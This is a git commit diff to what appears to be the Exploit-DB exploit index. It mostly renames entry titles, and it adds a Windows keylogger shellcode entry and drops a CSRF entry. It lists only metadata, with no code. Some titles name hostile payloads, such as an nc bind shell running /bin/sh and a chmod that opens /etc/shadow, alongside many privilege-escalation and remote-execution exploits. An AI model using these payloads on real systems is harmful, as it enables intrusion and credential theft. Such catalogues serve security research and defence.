DB: 2016-05-10

11 new exploits

JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7
JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7

BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)

Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)
Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)

RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)
RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)

UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)
UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)

The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)
The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)

Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)
Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)

QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS
GNU Bash - Environment Variable Command Injection (ShellShock)
Bash - Environment Variables Code Injection Exploit (ShellShock)
GNU Bash - Environment Variable Command Injection (Shellshock)
Bash - Environment Variables Code Injection Exploit (Shellshock)

OpenVPN 2.2.29 - ShellShock Exploit
OpenVPN 2.2.29 - Shellshock Exploit

Bash - CGI RCE Shellshock Exploit (Metasploit)
Bash CGI - RCE Shellshock Exploit (Metasploit)

PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)
PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)

OSSEC 2.8 - Privilege Escalation
OSSEC 2.8 - hosts.deny Privilege Escalation

ShellShock dhclient Bash Environment Variable Command Injection PoC
dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)

OSSEC 2.7 <= 2.8.1 - Local Root Escalation
OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)

BigTree CMS Cross Site Request Forgery Vulnerability

Advantech Switch Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)
KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)
KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)

Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes
Ajaxel CMS 8.0 - Multiple Vulnerabilities
i.FTP 2.21 - Host Address / URL Field SEH Exploit
Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution
ZeewaysCMS - Multiple Vulnerabilities
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation
Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)
RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC
ImageMagick Delegate Arbitrary Command Execution
Ruby on Rails Development Web Console (v2) Code Execution
This commit is contained in:
Offensive Security 2016-05-10 05:02:47 +00:00
parent 69f4286492
commit 01664c67b8
12 changed files with 1292 additions and 21 deletions


@ -12058,7 +12058,7 @@ id,file,description,date,author,platform,type,port
13645,platforms/windows/shellcode/13645.c,"JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0
13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit)",2010-03-24,corelanc0d3r,win32,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/linux/shellcode/13661.txt,"linux x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0
13669,platforms/linux/shellcode/13669.c,"chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
13670,platforms/linux/shellcode/13670.c,"execve(_/bin/sh_) shellcode (25 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
@ -12253,7 +12253,7 @@ id,file,description,date,author,platform,type,port
13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery SQL Vulnerability",2010-06-17,"L0rd CrusAd3r",asp,webapps,0
13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [CSRF] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0
13905,platforms/windows/local/13905.py,"BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7",2010-06-17,mr_me,windows,local,0
13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)",2010-06-17,mr_me,windows,local,0
13906,platforms/novell/dos/13906.txt,"Netware SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139
13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security - 143 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@ -12390,7 +12390,7 @@ id,file,description,date,author,platform,type,port
14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0
14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0
14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0
14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - (.m3u) Local BoF PoC",2010-06-26,Madjix,windows,dos,0
@ -12446,7 +12446,7 @@ id,file,description,date,author,platform,type,port
14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0day)",2010-06-30,emgent,hardware,webapps,80
14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF Vulnerability",2010-07-01,"ADEO Security",php,webapps,0
14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection Vulnerability",2010-07-01,"Th3 RDX",asp,webapps,0
14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0
14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0
14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0
14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0
14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0
@ -12498,7 +12498,7 @@ id,file,description,date,author,platform,type,port
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0
14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0
@ -15112,7 +15112,7 @@ id,file,description,date,author,platform,type,port
17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0
17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0
17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0
17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0
17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0
17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow Vulnerability",2011-06-11,huimaozi,windows,dos,0
@ -15350,7 +15350,7 @@ id,file,description,date,author,platform,type,port
17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0
17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0
17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)",2011-08-16,mr_me,windows,remote,0
17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0
17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability",2011-08-16,"Miroslav Stampar",php,webapps,0
17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion Vulnerability",2011-08-17,NoGe,php,webapps,0
17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection Vulnerability",2011-08-17,v3n0m,php,webapps,0
@ -15755,7 +15755,7 @@ id,file,description,date,author,platform,type,port
18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0
18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection Vulnerability",2011-11-19,TH3_N3RD,php,webapps,0
18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0
18137,platforms/win32/local/18137.rb,"QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
18137,platforms/win32/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
@ -31330,8 +31330,8 @@ id,file,description,date,author,platform,type,port
34762,platforms/php/webapps/34762.txt,"WordPress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (ShellShock)",2014-09-25,"Stephane Chazelas",linux,remote,0
34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (ShellShock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0
34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
34767,platforms/windows/dos/34767.py,"BS.Player 2.56 - (.m3u / .pls) File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos,0
34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 - 'tg-scan.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-27,anT!-Tr0J4n,windows,remote,0
34769,platforms/php/webapps/34769.txt,"MySITE SQL Injection and Cross-Site Scripting Vulnerabilities",2010-09-27,MustLive,php,webapps,0
@ -31430,7 +31430,7 @@ id,file,description,date,author,platform,type,port
34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0
34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0
34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - ShellShock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Shellshock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0
34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0
@ -31445,7 +31445,7 @@ id,file,description,date,author,platform,type,port
34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0
34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0
34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
@ -31678,7 +31678,7 @@ id,file,description,date,author,platform,type,port
35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@ -31755,7 +31755,7 @@ id,file,description,date,author,platform,type,port
35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
@ -33339,7 +33339,7 @@ id,file,description,date,author,platform,type,port
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -33660,7 +33660,7 @@ id,file,description,date,author,platform,type,port
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
@ -34565,7 +34565,7 @@ id,file,description,date,author,platform,type,port
38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues",2015-09-22,"Google Security Research",osx,dos,0
38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win32,dos,0
38266,platforms/win32/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
38267,platforms/win32/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
38268,platforms/win32/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
@ -34969,7 +34969,6 @@ id,file,description,date,author,platform,type,port
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0
38690,platforms/php/webapps/38690.html,"BigTree CMS Cross Site Request Forgery Vulnerability",2013-07-17,"High-Tech Bridge",php,webapps,0
38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server Multiple SQL Injection Vulnerabilities",2013-08-07,"Yogesh Phadtare",cgi,webapps,0
38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross Site Scripting Vulnerability",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0
38693,platforms/php/webapps/38693.txt,"Advanced Guestbook 'addentry.php' Arbitrary Shell Upload Vulnerability",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0
@ -35121,7 +35120,7 @@ id,file,description,date,author,platform,type,port
38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross Site Request Forgery Vulnerability",2013-11-15,"Yakir Wizman",hardware,remote,0
38852,platforms/php/webapps/38852.pl,"phpThumb 'phpThumb.php' Arbitrary File Upload Vulnerability",2013-12-01,DevilScreaM,php,webapps,0
@ -35380,8 +35379,8 @@ id,file,description,date,author,platform,type,port
39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
@ -35946,6 +35945,7 @@ id,file,description,date,author,platform,type,port
39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
